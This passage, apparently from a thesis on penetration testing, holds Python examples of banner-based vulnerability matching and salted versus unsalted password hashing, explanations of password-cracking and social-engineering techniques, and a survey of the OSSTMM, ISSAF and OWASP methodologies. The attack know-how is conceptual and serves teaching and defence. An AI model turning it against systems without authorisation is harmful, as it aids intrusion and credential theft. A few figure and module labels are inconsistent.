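    {"id": "VULN-C", "product": "Apache", "fixed_in": (2, 4, 20), "risk": 2.5},
]

BANNER_RE = re.compile(r"(OpenSSH|Apache)[_/](\d+(?:\.\d+)*)")


def parse_banner(banner):
    """Return (product, version tuple) or None when the banner is absent or unrecognised."""
    m = BANNER_RE.search(banner)
    if not m:
        return None
    return m.group(1), tuple(int(x) for x in m.group(2).split("."))


def match_vulns(service):
    """Signature matching: every database entry for this product whose fix
    version is newer than the version seen in the banner."""
    parsed = parse_banner(service["banner"])
    if parsed is None:
        return []
    product, version = parsed
    return [v for v in VULN_DB if v["product"] == product and version < v["fixed_in"]]


def combined_risk(risks):
    """Combine 0-10 scores like independent probabilities of compromise, so
    several low-rated findings on one host can add up to a high rating."""
    return 10 * (1 - prod(1 - r / 10 for r in risks))


def risk_label(score):
    return "low" if score < 4 else "medium" if score < 7 else "high"


def scan(services=DISCOVERED_SERVICES):
    """Return (per-host summary, services that need manual verification).

    Findings are unverified signature matches: a changed banner can produce
    both false positives and false negatives, which is why they are passed on
    to the target vulnerability validation step rather than reported as fact."""
    report, unverifiable = {}, []
    for s in services:
        if parse_banner(s["banner"]) is None:
            unverifiable.append((s["host"], s["port"]))
            continue
        for v in match_vulns(s):
            report.setdefault(s["host"], []).append(
                {"port": s["port"], "id": v["id"], "risk": v["risk"]})
    summary = {}
    for host, findings in report.items():
        risks = [f["risk"] for f in findings]
        summary[host] = {
            "findings": sorted(f["id"] for f in findings),
            "highest_single": risk_label(max(risks)),
            "combined": risk_label(combined_risk(risks)),
        }
    return summary, unverifiable


if __name__ == "__main__":
    summary, unverifiable = scan()
    for host, info in summary.items():
        print(host, info)
    print("verify manually:", unverifiable)
```

In the constructed data, host 10.0.0.5 carries three findings whose highest single rating is only "medium", yet the combined rating is "high", which is exactly the aggregation problem the text describes; the combination rule itself is an assumption of this example, since real scanners each use their own.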
Wireless scanning:
A wireless network, as the name suggests, is an environment in which devices connect to one another without physical cabling. Today, with the development of wireless technology and its convenience, wireless devices are used more and more, so organisations place growing importance on wireless network testing to protect this network environment [i14][i15]. Wireless scanning software is usually installed on a device with a wireless antenna, such as a laptop, a handheld device or a specialised device. This software should be able to scan all channels on the major frequency bands. Some software also integrates mapping or GPS functions that allow wireless devices to be located. Wireless scanning can use passive and active scanning techniques, and also needs a wireless device tracing technique to locate a given device. Bluetooth device scanning is another wireless scanning technique, needed by organisations that use Bluetooth devices. Locating a wireless device requires the mapping capability of the software, the operator's knowledge, and a suitable wireless antenna.
1.3.3. Target vulnerability validation techniques
Once the weaknesses found during the target discovery and analysis phase are in hand, target vulnerability validation techniques are needed to prove that the weaknesses exist and that a threat is present. These techniques require an experienced tester and must be carried out carefully, because their potential impact on the target system is greater than that of the other techniques.
Password cracking:
When a password is created, a one-way transformation is used to turn the password into a value called the hash value; this one-way transformation is called hashing. The hash value is stored in the system. When a user enters a password, the hashing technique is applied to it to produce a new hash value, which is compared with the hash value stored in the system. If the two hash values match, the user is authenticated. Password cracking is the process of recovering passwords from hash values taken from where they are stored in the system or captured while in transit over the network. Because hashing is one-way, to find the password one usually uses a program that takes guessed passwords, hashes them and compares the result with the obtained hash value. If they match, the password has been found. The guessed passwords may be every combination of the characters of the alphabet up to a given length. This technique is called brute force; it takes a long time to find the password, but it is considered certain to find the password provided there is enough time and enough computing power. To narrow the search, the guessed passwords can be taken from the words in a dictionary, since users often choose passwords that are meaningful words so as to remember them easily. This technique is called a dictionary attack. A combination of the two techniques above is called a hybrid attack: it uses dictionary words with groups of digits or special characters appended (for example: password99, password!@, ...). Yet another technique is called the rainbow table. It relies on computing the hash values in advance and storing them as a table of passwords and their computed hash values. When used, one only has to compare the hash values in the table with the obtained hash value. This technique is fast but takes a great deal of storage space.
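The password-verification and precomputed-table ideas above, as an added example written for this page (not code from the thesis). It assumes a constructed four-word list in place of a dictionary file and uses PBKDF2 with an assumed iteration count; it shows that a table of unsalted SHA-256 hashes answers a lookup in one step, while a random per-password salt and a slow key-derivation function give a different stored value for the same password, so such a table no longer applies.

```python
import hashlib
import hmac
import os

# Constructed word list standing in for a dictionary file.
WORDLIST = ["password", "letmein", "dragon", "qwerty"]

# Assumed cost parameter for the slow hash; a deployment would tune it.
ITERATIONS = 100_000


def unsalted_hash(password):
    """Legacy storage scheme: one fast hash of the password alone. Every user
    who picks the same password gets the same stored value."""
    return hashlib.sha256(password.encode()).hexdigest()


def build_table(words):
    """Precompute hash -> password once. This is the core idea of the rainbow
    table described above (without the chain compression a real table uses)."""
    return {unsalted_hash(w): w for w in words}


def lookup(table, stored_hash):
    """Against an unsalted fast hash, recovery is a single table lookup."""
    return table.get(stored_hash)


def make_record(password, salt=None):
    """Hardened storage scheme: a random 16-byte salt per password plus an
    iterated key-derivation function (PBKDF2-HMAC-SHA256)."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return {"salt": salt, "digest": digest}


def verify(record, candidate):
    """Login check: recompute under the stored salt and compare in constant time."""
    digest = hashlib.pbkdf2_hmac("sha256", candidate.encode(), record["salt"], ITERATIONS)
    return hmac.compare_digest(digest, record["digest"])


def table_covers(table, record):
    """Does the precomputed table say anything about this salted record?
    It cannot: the table was built without the salt, so no entry matches."""
    return record["digest"].hex() in table


if __name__ == "__main__":
    table = build_table(WORDLIST)
    print("unsalted lookup:", lookup(table, unsalted_hash("dragon")))
    rec = make_record("dragon")
    print("table covers salted record:", table_covers(table, rec))
    print("login checks:", verify(rec, "dragon"), verify(rec, "Dragon"))
```

The salt does not need to be secret; it only has to be unique, so that a single precomputed table cannot serve every account, and the iteration count raises the cost of each guess in the brute-force, dictionary and hybrid approaches alike.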
Penetration testing:
Presented in section 4 of Chapter 1.
Social engineering:
This technique attempts to trick someone into revealing information such as passwords, network details or configuration that can then be used to attack the system. To deceive, the attacker usually contacts the holder of the information by telephone or e-mail to get them to disclose it, or forges a web site of a bank or partner organisation so that users enter sensitive information into it. See [25] for further details.
1.4. The concept of penetration testing
Intrusion can be divided into two kinds according to how the target is approached: local intrusion, with physical access, and remote intrusion, via a network (LAN, WAN, Internet, ...). As stated in the introduction, this thesis covers only remote penetration testing, referred to simply as penetration testing, meaning the use of IT tools and techniques to break through controls and intrude into a computer network.
First, we consider some definitions of penetration testing.
Penetration testing can be defined as the act of intruding legally, with the owner's permission, in order to locate and successfully exploit vulnerabilities in computer systems or networks, with the aim of making the system more secure [13].
Another definition, from the book Metasploit: The Penetration Tester's Guide by David Kennedy, Jim O'Gorman, Devon Kearns and Mati Aharoni, is: penetration testing is the way you pose as an attacker and use the attackers' own methods to break security controls and gain unauthorised access to an organisation's systems [14].
NIST's definition of penetration testing is as follows: penetration testing is security testing in which the tester mimics real-world attacks to find methods of circumventing the security features of an application or system. It usually involves launching real attacks on real systems and data, using the tools and techniques commonly used by attackers [24].
The OWASP community's definition is as follows: a penetration test is a method of evaluating the security of a computer system or network by simulating an attack [27].
In summary, the definitions above show that penetration testing goes further than merely running vulnerability scanning tools to find weaknesses: it includes finding the weaknesses and combinations of weaknesses, then proposing and carrying out attacks to prove that the weaknesses are real and to show their impact. A properly conducted penetration test always ends with recommendations for locating and fixing the faults found during testing. To become an expert in penetration testing, one must not only understand security and be proficient with network attack tools, but must also be able to respond intelligently and quickly to each intrusion situation, analyse information well and, above all, act ethically in practising the profession. A penetration tester is also called:
- Pen tester
- PT
- Ethical hacker
- White hat hacker
Why is penetration testing needed?
Organisations and businesses that rely heavily on IT all invest substantially in their security programmes to protect critical IT infrastructure, discover gaps in the protection system and prevent important data from being stolen. Security testing is one of the most effective ways to discover the weaknesses, gaps or omissions in those security programmes. However, an isolated weakness does not reveal whether it can be exploited to breach security. By compromising the security checkpoints and getting past the security mechanisms through one weakness or a set of weaknesses, the penetration tester can discover the ways an attacker could use to damage the organisation's IT systems and potentially wreck the whole organisation. The goal of the penetration tester is not to aim at one or more systems, but to show, within the organisation's current security control mechanisms, how an attacker could cause serious damage to the organisation and what the impact of such an attack would be. This process is usually used to help secure the system against future attacks.
1.5. Summary of Chapter 1
This chapter of the thesis mainly presents a synthesis of the concepts of testing, security testing and penetration testing together with the related techniques. Security testing is usually divided into two branches: software security testing and network security testing. Software security testing is in turn divided into two branches: functional security testing, which specialises in finding faults in the system's designed security functions, and weakness (or intrusion) security testing, which focuses on studying how to get past the security wall protecting the software in order to learn whether the software responds as its design expects. Network security testing, whose object is the network system, comprises vulnerability scanning and penetration testing. The difference between vulnerability scanning and penetration testing was also distinguished.


Chapter 2. PENETRATION TESTING METHODOLOGIES
To carry out security testing in general and penetration testing in particular, there must be scientific methods serving as a theoretical foundation, so that the testing process does not end up incomplete, mistaken, off course or inconsistent. As introduced in Chapter 1, penetration testing is a branch of security testing and is usually studied as part of security testing. This chapter presents the popular security testing methodologies that have been applied in practice around the world, concentrating on the penetration testing part of each.
A security testing methodology is by no means simple, and penetration testing is more complex still. It describes a process or a solution and indicates what is tested or who tests, as well as when and where. Most of these methodologies decompose the security testing process into smaller processes with clear explanations. A security testing methodology must also explain what the test verifies and what its sub-processes do. Finally, the methodology must ensure that the resulting figures are accurate, understandable, and easy to compare and cross-check. Although the OSSTMM methodology does not focus specifically on penetration testing, it is considered the most comprehensive security testing methodology; its strength lies in quantifying security concepts and clearly distinguishing attack vectors and channels, so this thesis presents it in full to make use of those strengths, which the other methodologies do not address. The ISSAF methodology focuses on an applied penetration testing method; although it still emphasises security testing techniques in the software development phase, it builds a rather elaborate set of checklists, which can be regarded as a good reference for penetration testers. OWASP, for its part, is oriented to web application security testing, an indispensable technique for penetration testers, since nowadays the main path of intrusion into organisations is still through web applications.
This chapter also concentrates on clarifying the ethical issues facing security testers, because security testing clearly touches the sensitive information assets of organisations and companies; in addition to good moral character, the tester must master the professional rules, so as neither to abuse, nor to be used by a third party to harm, the organisation that requested the test.
2.1. The OSSTMM methodology
2.1.1. General concepts and terminology
The Open Source Security Testing Methodology Manual (OSSTMM), pronounced "awstem", is a project of the Institute for Security and Open Methodologies (ISECOM), a non-profit organisation founded in New York, USA, and Catalonia, Spain. The project is developed in an open community, with equal participation, and is not influenced by politics or commerce [5][i4]. The methodology has been upgraded to version 3.0.
It is a scientific methodology for accurately characterising operational security (OpSec) through testing in a consistent and repeatable way across the physical domain, human interaction, and all forms of connectivity such as wireless, wired, analogue and digital [5]. The methodology suits most kinds of testing, such as penetration testing, ethical hacking, security assessment, vulnerability assessment, red teaming, blue teaming, ...
According to OSSTMM, OpSec is a matter of separation and controls. For a target to be secure, it must be separated from the threats that can interact with it directly or indirectly. Perfect security is the state in which the target is completely separated from threats. In reality a target that does not interact with its surrounding environment is meaningless, so to be safe we must put in controls that reduce the impact of threats.
From a technical perspective, the approach is divided into four main groups: Scope, Channel, Index and Vector. The Scope is all the operating assets in the target environment on which an information-gathering process is defined. A Channel defines the kind of communication and interaction with the assets, which may be physical, spectrum or communications. The Index is a method considered useful for classifying and describing the target assets according to their specific kind, such as MAC address or IP address. Finally, the Vector is the direction in which the tester can assess and analyse each functional asset. The whole process lays out a technical roadmap for assessing the entire target environment, called the test Scope.

Figure 3: Overview of the OSSTMM model
The OSSTMM methodology also defines a series of terms, such as: control, attack surface, vector, attack vector, security, safety, porosity, limitation, vulnerability, weakness, RAV, operation, perfect security, ...
In addition, the OSSTMM methodology builds a theoretical basis that describes in detail the components making up operational security and quantifies these components together with their calculation formulas. Security is a relative concept: a given actual security level may be good for one organisation yet far too insecure for another. Quantifying security attributes therefore helps compute and express security in a consistent and repeatable manner.
(Figure 3 diagram labels: Scope; Channel; Index; Vector; Target; COMSEC; SPECSEC; PHYSSEC)
There are 18 basic quantities to determine during testing, falling into the following groups: three quantities of Operational Security, also called porosity; 10 quantities of Controls; 5 quantities of Limitations.
When the functions of the interaction points are ambiguous, we speak of porosity. Porosity reduces the separation between a threat and access. It has three components, representing the three quantities of Operational Security: Visibility, Access and Trust.
Controls fall into two groups. The first group, Class A interactive controls, comprises 5 quantities: Authentication, Indemnification, Resilience, Subjugation, Continuity.
The second group, Class B process controls, comprises 5 quantities: Non-Repudiation, Confidentiality, Integrity, Privacy, Alarm.
Finally, Limitations are the inability of a protection mechanism to operate. OSSTMM distinguishes five kinds of limitation, representing 5 quantities: Vulnerability, Weakness, Concern, Exposure, Anomaly.
2.1.2. Methodology
There are five security channels, Telecommunications, Data Networks, Physical, Human and Wireless, grouped into 3 channel classes: COMSEC covers Telecommunications and Data Networks; PHYSSEC covers Physical and Human; SPECSEC covers Wireless (see Table 1). Channels are the specific means of interacting with the targets. Each channel has its own way of testing and of calculating the basic quantities.
The following table describes the channels. This organisation is designed to make the testing process convenient while minimising inefficient costs.
Class | Channel | Description
Physical security (PHYSSEC) | Human | Comprises the human element of communication, where the interaction is either physical or psychological.
Physical security (PHYSSEC) | Physical | Physical security testing, where the channel is both physical and non-electronic in nature.
Spectrum security (SPECSEC) | Wireless | Comprises all electronic communications, signals and emanations that carry a signal through the air without cables.
Communications security (COMSEC) | Telecommunications | Comprises all telecommunication networks, digital or analogue, where interaction takes place over the telephone or telephone-like networks.
Communications security (COMSEC) | Data Networks | Comprises all electronic systems and data networks where interaction takes place over cables and wired networks.
Table 1: Interaction channels
The types of test differ according to how much the tester knows about the target, what the target knows about the tester or expects from the test, and the legitimacy of the test. Some tests examine the tester's skill more than they actually test the security of the target.

Figure 4: Types of tests (diagram; horizontal axis: the attacker's knowledge of the target; vertical axis: the target's knowledge of the attack; regions labelled Blind, Double blind, Gray box, Double gray box, Tandem and Reversal)
No. | Type | Description
1 | Blind | The tester has no knowledge of the defences, assets or channels of the targets. The target is prepared for the test, knowing all the details of the test in advance.
2 | Double blind | The tester has no knowledge of the defences, assets or channels of the targets. The target is not notified in advance of the test scope, the test channels or the test vectors.
3 | Gray box | The tester has limited knowledge of the defences and assets of the targets and full knowledge of the channels. The target is prepared for the test, knowing all the details of the test in advance.
4 | Double gray box | The tester has limited knowledge of the defences and assets of the targets and full knowledge of the channels. The target is notified in advance of the scope and time frame of the test, but not of the test channels or test vectors.
5 | Tandem | The tester and the target are both prepared for the test, both knowing all the details of the test in advance.
6 | Reversal | The tester engages the targets with full knowledge of their processes and operational security, but the target knows nothing of what, how or when the tester will test.
Table 2: Description of the test types
The OSSTMM methodology also sets out rules of engagement that establish rules and practical operating guidelines for marketing and sales, test agreement contracts, test execution and the handling of test results.
The operational security testing process is the examination of discrete events of a dynamic and stochastic system. This means that we run the test cases sequentially over time on a system that is constantly changing and does not always give the same output for the inputs provided. OSSTMM applies a process combining the four point process (4PP) and the Trifecta, with the following steps:
Step 1: Passively collect data on normal operation to understand the target.
Step 2: Actively test operations by agitating them beyond the normal level.
Step 3: Analyse the data received directly from the testing operations.
Step 4: Analyse indirect data from the resources and the operators.
Step 5: Correlate and reconcile the information obtained in steps 3 and 4 to determine the operational security processes.
Step 6: Determine and reconcile errors.
Step 7: Collect metrics from both normal and agitated operations.
Step 8: Correlate and reconcile the information between steps 1 and 2 to determine the optimal level of protection and controls.
Step 9: Map the optimal operational state to the processes (step 5).
Step 10: Create a gap analysis to determine what enhancements are needed in the processes and controls required for protection and controls (step 5) in order to reach the optimal operational state (step 8) from the current one.

Figure 5: The operational security testing process (diagram of the ten steps above, arranged around the target and its environment)
Error handling: the OSSTMM methodology holds that an error is not a negative sign; in some sense it is positive. Because an error may not be the tester's fault, understanding how and where errors exist during testing is far more reasonable than expecting the tester to make none. Moreover, a tester who tries unreasonably hard may suddenly make errors; portraying errors as negative reduces the value of thorough testing in practice. There are 12 kinds of error (false positive, false negative, gray positive, gray negative, human error, ...), and recording the test errors helps summarise the environment in a simplified way.
Test results usually come with a proposed solution or advice, but this is not required in OSSTMM testing. Often there is no suitable solution, given the tester's limited view of the customer's environment. Solutions are therefore not part of an OSSTMM test. The tester concludes a test under this methodology with a STAR report, which states clearly what was done and the results, what was not done and what remains unclear, together with the reasons. The template for this report can be downloaded from the ISECOM web site [i4].
2.1.3. Quantitative analysis
Metrics-based operational security assessment is a method of computing operational security parameters in order to finally arrive at an actual security value. Almost every field of scientific and social research has built a standard scale. The security field, however, still has no standard scale that would make security research more convenient. Each security testing programme assesses the security level on its own scale and with its own unit of measurement. For example, some programmes divide the scale into low, medium and high, while others divide it into low, medium, high and very high. Moreover, the measurement of IT security attributes is usually based on the expertise, intuition and viewpoint of the assessor, who creates an ordering that is then quantified (for example, 1 = low, 2 = medium, 3 = high). The OSSTMM methodology establishes security attributes and corresponding scales. The project is also trying to promote these attributes and scales into a standard.

Figure 6: Excel file for calculating the RAV
The RAV is the measure of the attack surface, the number of uncontrolled interactions with the target, computed from the quantitative balance between operational security, controls and limitations. It is used as the unit of measure for actual security. The RAV is used to understand how much of the attack surface is exposed. On this scale, 100 RAV is perfect balance; a lower RAV value means fewer security controls and hence a larger attack surface. More than 100 RAV indicates more controls than necessary, which can itself be a problem, since controls often add interactions as well as complexity and maintenance issues within the scope [5].
The OSSTMM methodology builds a formula for computing Actual Security in units of RAV, based on 18 basic values. The formula is described in detail in Appendix B. OSSTMM also provides a tool that computes this formula automatically, an Excel spreadsheet posted on the ISECOM web site [i4] (Figure 6). One need only measure and enter the figures for the 18 basic quantities, and the file automatically computes Actual Security in RAV. According to OSSTMM, 100 RAV is considered absolute security and 0 RAV no security at all. The way the 18 values are calculated can be summarised in the following table:
No. | Quantity | Description
Porosity
1 | Visibility | The number of targets visible within the scope. Example: testing in the HUMSEC scope class, there are 50 staff, but only 38 of them interacted with the test via the vector and channel. Visibility is therefore 38.
2 | Access | Computed by counting the total number of accesses for each interaction point.
3 | Trust | Computed by counting the total Trust for each interaction point.
Controls
1 | Authentication | Count each instance in which authentication is required for access.
2 | Indemnification | Count each instance in which a method of legal liability and compensation insurance is used for all assets within the scope.
3 | Subjugation | Count each instance of Access or Trust within the scope that does not allow controls to be chosen by the user at all.
4 | Continuity | Count each instance of Access or Trust within the scope that ensures no interruption of interaction over the channel and vector, even in the event of failure.
5 | Resilience | Count each instance of Access or Trust within the scope that remains secure on failure or does not provide new access when security fails.
6 | Non-repudiation | Count each instance of Access or Trust that ensures an interaction occurring at a specific time between specific parties can be identified and recorded.
7 | Confidentiality | Count each instance of Access or Trust within the scope that has the means to keep the content of the information exchanged between the interacting parties from being disclosed.
8 | Privacy | Count each instance of Access or Trust within the scope that has the means to carry out the method of interaction without disclosure between the interacting parties.
9 | Integrity | Count each instance of Access or Trust within the scope that ensures the process of interaction and access to assets cannot be corrupted, stopped, continued, redirected or reversed without the knowledge of the parties involved.
10 | Alarm | Count each instance of Access or Trust in which data is logged or a notification is generated when an unauthorised and unwanted increase in porosity occurs.
Limitations
1 | Vulnerability | Count each flaw or error that allows a person or process to gain access, to deny access to others, or to hide itself or assets within the scope despite the protections.
2 | Weakness | Count each flaw or error in the interactive controls: authentication, resilience, indemnification, subjugation and continuity.
3 | Concern | Count each flaw or error in the process controls: non-repudiation, confidentiality, privacy, integrity and alarm.
4 | Exposure | Count each unjustifiable action, flaw or error that provides direct or indirect visibility of targets or assets.
5 | Anomaly | Count each unidentifiable or unknown element that cannot be accounted for in normal operations.
Table 3: Basic quantities used in computing actual security
2.1.4. Workflow
This methodology organises the testing activities hierarchically: first the channel; second the module; third the task. As noted above, there are 5 channels in all; for each channel, 17 modules are carried out in turn, divided into 4 phases: the induction phase comprising the first 3 modules, the interaction phase comprising modules 4 to 7, the inquest phase comprising modules 8 to 13, and the intervention phase comprising the remaining modules 14 to 17. Within each module, depending on the channel, there are specific tasks to perform in order to obtain the values of the 18 quantities presented above (described in detail in chapters 7, 8, 9, 10 and 11 of the OSSTMM 3 manual [5]). The tester must therefore perform 17 * 5 = 85 analyses before the final report can be produced.

Figure 7: The single workflow (applied to all kinds of security testing)
(Figure 7 module labels: 1. Posture review; 2. Logistics; 3. Active detection verification; 4. Visibility audit; 5. Access verification; 6. Trust verification; 7. Controls verification; 8. Process verification; 9. Configuration verification; 10. Property validation; 11. Segregation review; 12. Exposure verification; 13. Competitive intelligence scouting; 14. Exposure verification; 15. Privileges audit; 16. Survivability validation; 17. Alert and log review)
2.1.5. Conclusions on the OSSTMM methodology
From the description of the OSSTMM methodology above, its main features and benefits can be summarised as follows:
- Practising the OSSTMM methodology significantly reduces the occurrence of false negatives and false positives and provides accurate security measurement.
- The framework adapts to many kinds of security testing, such as penetration testing, white box testing, vulnerability assessment, etc.
- It ensures that the assessment is carried out thoroughly and that the results can be aggregated in a consistent, quantifiable and reliable way.
- The assessed security metrics can be obtained using the RAV method. The RAV computes the actual security value from operational security, loss controls and limitations. The value obtained, known as the RAV score, represents the current security state of the target.
- Formal assessment reports using the Security Test Audit Report (STAR) template are convenient for management and help the technical team review the test targets, the risk assessment values and the output of each test phase.
- The methodology is regularly updated with new security testing trends, regulations and ethical concerns.
- OSSTMM processes can easily be coordinated with industry regulations, business policies and legislation.
- In addition, a qualifying test certification can be recognised directly from ISECOM.
2.2. The ISSAF methodology
2.2.1. Introduction
The Information System Security Assessment Framework (ISSAF) [i5] is the security testing methodology of the OISSG. Created in 2003, it lets researchers and IT security professionals contribute to and discuss the field of IT security.
ISSAF is an open-source security testing framework focused mainly on penetration testing. Its framework is divided into several domains that address security assessment in sequence. Each domain assesses different parts of a target system and provides input to a successful security engagement. ISSAF was developed with a focus on two areas of security testing: management and technical.
The management side covers engagement management and the best practices that must be followed throughout the testing process, while the technical side implements the core set of rules and procedures to be followed and creates a complete security assessment process.
On the management side, ISSAF chooses to focus on Enterprise Risk Management. A systematic approach on the management side lets security be practised like a day-to-day business activity, determining step by step the order of activities to be carried out and then managing them one by one until a reasonable level of security management for the information assets is ensured. ISSAF builds a four-phase model for managing security activity: Planning, Assessment, Treatment and Accreditation.
Phase 1: Planning comprises information gathering, drawing up the project charter, determining resources, the budget and financial reporting templates, work breakdown structure analysis and project kick-off [26].
Phase 2: Assessment is the core of the methodology, used to assess the security risks to the enterprise; it emphasises assessing information security risk from the perspective of the enterprise's business objectives and the related risks [26]. First the inherent risks present in the system are identified; from the inherent risks found, the risks that may arise from the level of IT use in the enterprise are then identified. This identification of IT risk is then used to build the enterprise's security requirements and security controls. The assessment phase is thus divided into two parts: inherent risk identification and control assessment. This phase proposes a good practice and three sub-phases, pre-assessment, assessment and post-assessment, with a checklist of tasks to be followed by the members taking part in the assessment.
Phase 3: Treatment selects safeguards, develops implementation plans and provides accurate guidance documents for implementation and for the risk treatment decision process. An important task in risk treatment is that once a decision to mitigate a risk is made, one or more risk-mitigating controls are selected and a project is planned to implement those controls.
Phase 4: Accreditation is the process that includes assessment of the selected controls. The outcome of the assessment is ISSAF accreditation of an organisation in the form of a certificate. OISSG provides an official ISSAF compliance certificate. This certificate can also be issued through certification bodies authorised by OISSG.
Phase 5: Maintenance is an additional phase ensuring that the accredited organisation continues to comply with ISSAF. To ensure this, OISSG regularly conducts compliance audits. The frequency of these reviews is based on the size of the organisation and the scope of the accreditation.
On the technical side, ISSAF builds a series of testing methods for each component of the IT system, such as: penetration testing; password security testing; security assessment of network devices such as switches, routers, firewalls, IDS, VPN, anti-virus, SAN, WLAN, ...; security assessment of Windows, Linux, Novell and web servers; security assessment of web applications, source code and databases; and even non-technological security assessment such as physical security and social engineering. Within the scope of this thesis, the author studies and presents only the penetration testing method in ISSAF. In general this method resembles most other penetration testing methods, but its approach of detailing each checklist with a description of every command or trick to be performed makes the method intuitive and easy to understand.
2.2.2. The ISSAF penetration testing framework
ISSAF's penetration testing method comprises 3 phases of approach and 9 assessment steps:
Phase 1: Planning and preparation. This is the phase of initial information exchange, planning and preparation for the test. A formal assessment agreement is signed as the legal basis. The time and duration of the test, the team taking part, the escalation path, etc. are determined.
Phase 2: Assessment. This is the phase in which the penetration test is actually carried out. A layered approach is followed in this phase. There are nine assessment layers:
Layer 1. Information gathering
Layer 2. Network mapping
Layer 3. Vulnerability identification
Layer 4. Penetration
Layer 5. Gaining access and privilege escalation
Layer 6. Enumerating further
Layer 7. Compromising remote users/sites
Layer 8. Maintaining access
Layer 9. Covering the tracks
The steps are carried out iteratively, as represented by the circular arrows in the assessment phase in Figure 8. The nine layers in particular are described in great detail, and a great deal of corresponding software is introduced that can be used in each layer or consulted during testing. See section C of the ISSAF 0.2.1 draft [26] for details.
Phase 3: Reporting, clean-up and destroying artefacts. This comprises verbal reporting (done when something unexpected or an important issue arises during the penetration test) and the final report, produced after all the test cases defined in the scope of work have been completed. Finally comes clean-up: all information created and/or stored on the test systems must be removed from those systems. If it cannot be removed from a remote system, all such files (with their locations) should be mentioned in the technical report so that the customer's technical staff can remove them after the report has been produced.
Figure 8: Diagram of the ISSAF penetration testing method
(Figure 8 labels: Methodology; (1) Planning and preparation; (2) Assessment; (3) Reporting, clean-up and destroying artefacts; within the assessment phase: 1. Information gathering; 2. Network mapping; 3. Vulnerability identification; 4. Penetration; 5. Gaining access and privilege escalation; 6. Enumerating further; 7. Compromising remote users/sites; 8. Maintaining access; 9. Covering the tracks)
2.2.3. Conclusions on the ISSAF methodology
Although not yet fully complete, ISSAF has the following main features and benefits:
- It provides a high-value infrastructure security proposal by assessing existing security controls against critical vulnerabilities.
- The framework addresses the various important areas of information security, including risk assessment, business structure and management, control assessment, engagement management, security policy development and good practices.
- The overall technical assessment processes provided by ISSAF include operations management, physical security assessment, penetration testing methodology, incident management, change management, business continuity management, security awareness, and legal and regulatory compliance.
- ISSAF's penetration testing method is completely clear and intuitively structured for examining the security of a system, network or application, because the framework can focus on specific target technologies, including routers, switches, firewalls, IDS, SAN, VPN, various operating systems, web application servers, databases, etc.
- It bridges the technical and management perspectives on security testing by implementing the controls needed to handle both areas.
- ISSAF lets management understand the risks currently present on the organisation's perimeter defences and mitigate them proactively by identifying the vulnerabilities that may affect business integrity.
Economic benefits of ISSAF
- It supports the IEC/ISO 27001:2005 (BS7799), Sarbanes-Oxley SOX404, CoBIT, SAS70 and COSO standards by adding value to IT-based business activities.
- Its main value stems from the fact that it provides a testing resource, freeing users from having to invest resources and research in solving their own information security problems.
- It is designed bottom-up.
ISSAF comprises a rich set of baseline technical assessment standards for testing a number of different technologies and processes. This, however, raises another problem: maintenance, that is, continuously updating the framework to reflect the assessment criteria of new technologies or updated tools. Compared with OSSTMM, OSSTMM is less affected by obsolescence, because older tests can still use the same methodology across security engagements that use different tool sets and techniques. Furthermore, the OSSTMM methodology concentrates on security assessment and pays little attention to risk analysis, whereas ISSAF, conversely, focuses more on risk analysis and management. In summary, ISSAF can be combined with OSSTMM or any similar testing methodology so as to combine their strengths. It is important to note, however, that ISSAF is still in its infancy compared with the other methodologies and frameworks.
2.3. The OWASP methodology
2.3.1. Introduction
The Open Web Application Security Project (OWASP) [27] was founded in 2001. It is a non-profit, open-community organisation whose main goal is to improve the security of application software, especially web applications. The organisation also builds many different testing tools, all of them open source and free. OWASP advocates an approach to application security in terms of People, Process and Technology: these are the factors that produce software, and if they behave securely, the software is secure. According to OWASP, web applications on the network are mostly exposed to the outside, so they are the first targets of destructive attacks and unauthorised modification. They are therefore the gateway through which an attacker intrudes into the application layer before taking the next steps to intrude into the system. Because such security holes are very common, several testing methods have been introduced to assess the severity of the basic security risks of web applications. One effort of the OWASP open community was to build a web application penetration testing framework and to promote the OWASP Top 10 project in order to raise organisations' application security awareness. The OWASP Top 10 project does not concern itself with complete application security programmes; it provides the foundation needed to integrate security through secure programming principles and practices [3]. The OWASP Top 10 project classifies web application security risks by assessing the top attack vectors and security holes in relation to their technical and business impact. The assessment of each top risk in the project is carried out on a yearly cycle in order to point out the most serious risks of each year (there are not only 10 risks to consider but a great many; each year, however, OWASP selects the 10 most harmful). The project also provides specific guidance on how to test, verify and partially remediate the vulnerabilities of an application. Although not its focus, some guides are available from the OWASP community to help developers and security testers manage web applications effectively in terms of security, at the links below [27]:
Developer's Guide:
www.owasp.org/index.php/Guide
Testing Guide:
www.owasp.org/index.php/Category:OWASP_Testing_Project
Code Review Guide:
www.owasp.org/index.php/Category:OWASP_Code_Review_Project
For OWASP, software security in general and web application security in particular must be emphasised from the earliest phases, definition and design, and maintained through the later phases: development, deployment and maintenance. In short, security testing should be applied throughout the software development life cycle (SDLC). This guide is therefore not only for security testers; it must also be read and used by software developers and testers. Keeping the security information continuously up to date is an important aspect of this guide project. To meet this requirement OWASP adopts a wiki approach, so that the OWASP community can develop and extend the information in the guide to keep pace with the rapid evolution of security threats aimed at applications.
2.3.2. Testing principles
To understand OWASP's methodology, one must understand the testing principles it holds. Stating these principles helps testers keep the right bearing while working, and the principles also served as OWASP's compass when it built the framework. They are as follows:
There is no software or tool that protects an application absolutely.
Think strategically, not tactically. The tactical model is patch and penetrate, which relates to the window of exposure of a vulnerability (Figure 8): a reported bug is fixed without an adequate investigation of its root causes [27]. To prevent this, security must be built into the SDLC through appropriate standards, policies and development guidelines.
The SDLC comes first. OWASP holds that software development should follow some SDLC and that security must be considered so that it becomes a component of the SDLC in use.
Test early and test often. The aim is to detect bugs early in the SDLC, when they can be resolved quickly and at lower cost.
OWASP holds that security testing must go beyond ordinary software testing. Whereas software testing checks the normal behavior of users who use the application in the way you expect, security testing requires going beyond what is expected and thinking like an attacker trying to break the application.
Demand accurate documentation of the application. Architecture, data flow diagrams, use cases and more must be written down in formal, reviewable documents.
Do not belittle or skip even the smallest detail when assessing application security. Take care to detect and remove false positives from the report, and prefer source code review to find security problems whenever the source code is available.
Develop and build consistent measurement mechanisms and scales. OWASP recommends using the standard metrics provided by the OWASP Metrics project.
Finally, there must be a formal report of the testing activities and the results obtained. A uniform format should be built so that all parties can understand it easily, and dedicated staff should write the report.
Figure 9: The window of exposure of a vulnerability
2.3.3. Testing techniques
OWASP introduces the following main testing techniques, which can be used when building a testing program:
Manual inspections and reviews.
